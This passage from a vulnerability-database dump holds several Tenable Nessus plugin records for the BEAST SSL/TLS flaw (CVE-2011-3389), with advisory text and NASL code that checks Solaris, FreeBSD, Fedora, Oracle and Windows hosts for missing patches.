script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:125359\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.2.4,REV=2006.11.16.21.41\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.6.4,REV=2006.11.16.21.41\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.6.4,REV=2006.11.16.21.41\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.11.4,REV=2006.11.16.21.41\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.11.4,REV=2006.11.16.21.41\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125359-15\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.11.4,REV=2006.11.16.21.41\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:44", "description": "Matthias Andree reports :\n\nFetchmail version 6.3.9 enabled 'all SSL workarounds' (SSL_OP_ALL) which contains a switch to disable a countermeasure against certain attacks against block ciphers that permit guessing the initialization vectors, providing that an attacker can make the application (fetchmail) encrypt some data for him -- which is not easily the case.\n\nStream ciphers (such as RC4) are unaffected.\n\nCredits to Apple Product Security for reporting this.", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "nessus", "title": "FreeBSD : fetchmail -- chosen plaintext attack against SSL CBC initialization vectors (18ce9a90-f269-11e1-be53-080027ef73ec) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:fetchmail", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_18CE9A90F26911E1BE53080027EF73EC.NASL", "href": "https://www.tenable.com/plugins/nessus/61725", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61725);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"FreeBSD : fetchmail -- chosen plaintext attack against SSL CBC initialization vectors (18ce9a90-f269-11e1-be53-080027ef73ec) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Matthias Andree reports :\n\nFetchmail version 6.3.9 enabled 'all SSL workarounds' (SSL_OP_ALL)\nwhich contains a switch to disable a countermeasure against certain\nattacks against block ciphers that permit guessing the initialization\nvectors, providing that an attacker can make the application\n(fetchmail) encrypt some data for him -- which is not easily the case.\n\nStream ciphers (such as RC4) are unaffected.\n\nCredits to Apple Product Security for reporting this.\");\n # https://vuxml.freebsd.org/freebsd/18ce9a90-f269-11e1-be53-080027ef73ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1aeae316\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fetchmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"fetchmail>=6.3.9<6.3.22\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:27", "description": "The latest version of Firefox and Thunderbird have the following changes :\n\n - Added Type Inference, significantly improving JavaScript performance\n\n - Added support for querying Do Not Track status via JavaScript\n\n - Added support for font-stretch\n\n - Improved support for text-overflow\n\n - Improved standards support for HTML5, MathML, and CSS\n\n - Fixed several stability issues\n\n - Fixed several security issues\n\nNotable nss changes include :\n\n1. SSL 2.0 is disabled by default.\n\n2. A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext attack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by default. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable it.\n\n3. SHA-224 is supported.\n\n4. Added PORT_ErrorToString and PORT_ErrorToName to return the error message and symbolic name of an NSS error code.\n\n5. Added NSS_GetVersion to return the NSS version string.\n\n6. Added experimental support of RSA-PSS to the softoken only (contributed by Hanno Bock, http://rsapss.hboeck.de/).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "nessus", "title": "Fedora 15 : firefox-9.0.1-1.fc15 / gnome-python2-extras-2.25.3-35.fc15.4 / nspr-4.8.9-2.fc15 / etc (2011-17399)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:nspr", "p-cpe:/a:fedoraproject:fedora:nss", "p-cpe:/a:fedoraproject:fedora:nss-softokn", "p-cpe:/a:fedoraproject:fedora:nss-util", "p-cpe:/a:fedoraproject:fedora:perl-gtk2-mozembed", "p-cpe:/a:fedoraproject:fedora:thunderbird", "p-cpe:/a:fedoraproject:fedora:thunderbird-lightning", "p-cpe:/a:fedoraproject:fedora:xulrunner", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-17399.NASL", "href": "https://www.tenable.com/plugins/nessus/57622", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17399.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57622);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2011-17399\");\n\n script_name(english:\"Fedora 15 : firefox-9.0.1-1.fc15 / gnome-python2-extras-2.25.3-35.fc15.4 / nspr-4.8.9-2.fc15 / etc (2011-17399)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The latest version of Firefox and Thunderbird have the following\nchanges :\n\n - Added Type Inference, significantly improving JavaScript\n performance\n\n - Added support for querying Do Not Track status via\n JavaScript\n\n - Added support for font-stretch\n\n - Improved support for text-overflow\n\n - Improved standards support for HTML5, MathML, and CSS\n\n - Fixed several stability issues\n\n - Fixed several security issues\n\nNotable nss changes include :\n\n1. SSL 2.0 is disabled by default.\n\n2. A defense against the SSL 3.0 and TLS 1.0 CBC chosen plaintext\nattack demonstrated by Rizzo and Duong (CVE-2011-3389) is enabled by\ndefault. Set the SSL_CBC_RANDOM_IV SSL option to PR_FALSE to disable\nit.\n\n3. SHA-224 is supported.\n\n4. Added PORT_ErrorToString and PORT_ErrorToName to return the error\nmessage and symbolic name of an NSS error code.\n\n5. Added NSS_GetVersion to return the NSS version string.\n\n6. Added experimental support of RSA-PSS to the softoken only\n(contributed by Hanno Bock, http://rsapss.hboeck.de/).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://rsapss.hboeck.de/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://rsapss.hboeck.de/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072222.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47ee3616\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072223.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?12cc855e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072224.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bf1b5d3\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072225.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3c745d9a\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072226.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?648a9ef9\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072227.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ab134ef\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2aa50f32\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072229.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9f1fb28a\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072230.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e3ea6b9\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/072231.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a402c324\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss-softokn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nss-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:thunderbird-lightning\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"firefox-9.0.1-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"gnome-python2-extras-2.25.3-35.fc15.4\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"nspr-4.8.9-2.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"nss-3.13.1-10.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"nss-softokn-3.13.1-15.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"nss-util-3.13.1-3.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"perl-Gtk2-MozEmbed-0.09-1.fc15.8\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"thunderbird-9.0-4.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"thunderbird-lightning-1.1-0.1.rc1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"xulrunner-9.0.1-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / gnome-python2-extras / nspr / nss / nss-softokn / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:41", "description": "The version of Oracle HTTP Server installed on the remote host is affected by an information disclosure vulnerability, known as BEAST, in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API.", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "nessus", "title": "Oracle Fusion Middleware Security Service Information Disclosure (January 2015 CPU) (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:http_server"], "id": "ORACLE_HTTP_SERVER_CPU_JAN_2015_LDAP.NASL", "href": "https://www.tenable.com/plugins/nessus/81003", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81003);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Oracle Fusion Middleware Security Service Information Disclosure (January 2015 CPU) (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle HTTP Server installed on the remote host is\naffected by an information disclosure vulnerability, known as BEAST,\nin the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the\ninitialization vector (IV) is selected when operating in cipher-block\nchaining (CBC) modes. A man-in-the-middle attacker can exploit this to\nobtain plaintext HTTP header data, by using a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session, in conjunction with\nJavaScript code that uses the HTML5 WebSocket API, the Java\nURLConnection API, or the Silverlight WebClient API.\");\n # https://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?75c6cafb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2015 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3389\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_http_server_installed.nbin\");\n script_require_keys(\"Oracle/OHS/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Oracle/OHS/Installed\");\ninstalls = get_kb_list_or_exit(\"Oracle/OHS/*/Version\");\nhascomp = FALSE;\n\n# For this check, we need Middleware home which should be\n# oracle_common one directory up\nforeach install (keys(installs))\n{\n mwohome = install - 'Oracle/OHS/';\n mwohome = mwohome - '/Version';\n\n mwohome = ereg_replace(pattern:'^(/.*/).*$', string:mwohome, replace:\"\\1oracle_common\");\n\n # Make sure the component that is being patched exists in\n # the Middleware home\n if (find_oracle_component_in_ohome(ohome:mwohome, compid:'oracle.ldap.rsf'))\n {\n hascomp = TRUE;\n mwinstalls[mwohome] = installs[install];\n }\n}\n\npatches = make_array();\npatches['12.1.3.0'] = make_list('19485414','22557350', '26398022', '24329181', '27244723', '30112527', '30692958');\npatches['12.1.2.0'] = make_list('19485397', '21768251', '21773977');\n\nif(hascomp)\n{\n oracle_product_check_vuln(\n product : 'Oracle HTTP Server',\n installs : mwinstalls,\n patches : patches\n );\n}\nelse exit(0, 'No Middleware Homes were found with the oracle.ldap.rsf component.');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:40", "description": "The remote host is affected by an information disclosure vulnerability, known as BEAST, in the SSL 3.0 and TLS 1.0 protocols due to a flaw in the way the initialization vector (IV) is selected when operating in cipher-block chaining (CBC) modes. A man-in-the-middle attacker can exploit this to obtain plaintext HTTP header data, by using a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, the Java URLConnection API, or the Silverlight WebClient API.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.", "cvss3": {}, "published": "2012-01-10T00:00:00", "type": "nessus", "title": "MS12-006: Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS12-006.NASL", "href": "https://www.tenable.com/plugins/nessus/57474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57474);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_xref(name:\"CERT\", value:\"864643\");\n script_xref(name:\"MSFT\", value:\"MS12-006\");\n script_xref(name:\"IAVB\", value:\"2012-B-0006\");\n script_xref(name:\"MSKB\", value:\"2585542\");\n script_xref(name:\"MSKB\", value:\"2638806\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"MS12-006: Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possibe to obtain sensitive information from the remote\nWindows host using the Secure Channel security package.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by an information disclosure\nvulnerability, known as BEAST, in the SSL 3.0 and TLS 1.0 protocols\ndue to a flaw in the way the initialization vector (IV) is selected\nwhen operating in cipher-block chaining (CBC) modes. A\nman-in-the-middle attacker can exploit this to obtain plaintext HTTP\nheader data, by using a blockwise chosen-boundary attack (BCBA) on an\nHTTPS session, in conjunction with JavaScript code that uses the HTML5\nWebSocket API, the Java URLConnection API, or the Silverlight\nWebClient API.\n\nTLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are\nnot affected.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-006\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2011/09/23/chromeandbeast.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/tls-cbc.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-006';\nkbs = make_list('2585542', '2638806');\nif 